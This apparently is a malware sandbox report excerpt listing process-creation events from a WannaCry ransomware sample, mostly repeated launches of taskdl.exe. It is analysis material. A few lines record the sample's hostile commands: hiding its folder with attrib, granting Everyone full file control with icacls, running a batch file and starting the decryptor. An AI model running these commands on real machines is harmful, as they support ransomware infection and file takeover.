Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv Uh7zHirJxEOn/q4qaZ2wzQ.0.2
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: unknown	Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe "C:\Users\user\Desktop\@WanaDecryptor@.exe"
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Windows\SysWOW64\attrib.exe attrib +h .	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 133611722583794.bat	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
